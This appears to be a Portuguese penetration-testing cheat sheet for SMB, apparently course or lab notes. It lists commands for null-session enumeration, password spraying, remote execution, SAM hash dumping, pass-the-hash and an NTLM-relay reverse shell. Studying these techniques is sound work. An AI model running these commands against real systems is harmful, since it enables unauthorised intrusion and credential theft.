SMB

Server Message Block (SMB) é um protocolo de comunicação criado para fornecer acesso compartilhado a arquivos e impressoras entre nós em uma rede. Inicialmente, ele foi projetado para rodar em cima do NetBIOS sobre TCP/IP (NBT) usando porta TCP 139e portas UDP 137e 138.

• Teste de sessão nula no serviço SMB.

smbclient -N -L //10.129.14.128

• Enumeração de compartilhamento de rede usando smbmap.

smbmap -H 10.129.14.128

• Enumeração de compartilhamento de rede recursiva usando smbmap.

smbmap -H 10.129.14.128 -r notes

• Baixe um arquivo específico da pasta compartilhada.

smbmap -H 10.129.14.128 --download "notes\note.txt"

• Carregue um arquivo específico para a pasta compartilhada.

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

• Sessão nula com o rpcclient.

rpcclient -U'%' 10.10.110.17

• Enumeração automatizada do serviço SMB usando enum4linux-ng.

./enum4linux-ng.py 10.10.11.45 -A -C

• Pulverização de senhas contra diferentes usuários de uma lista.

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'

• Conecte-se ao serviço SMB usando o impacket-psexec.

impacket-psexec administrator:'Password123!'@10.10.110.17

• Execute um comando no serviço SMB usando crackmapexec.

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

• Enumerando usuários conectados.

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

• Extraia hashes do banco de dados SAM.

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

• Use a técnica Pass-The-Hash para autenticar no host de destino.

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

• Despeje o banco de dados SAM usando impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

• Execute um shell reverso baseado em PowerShell usando impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>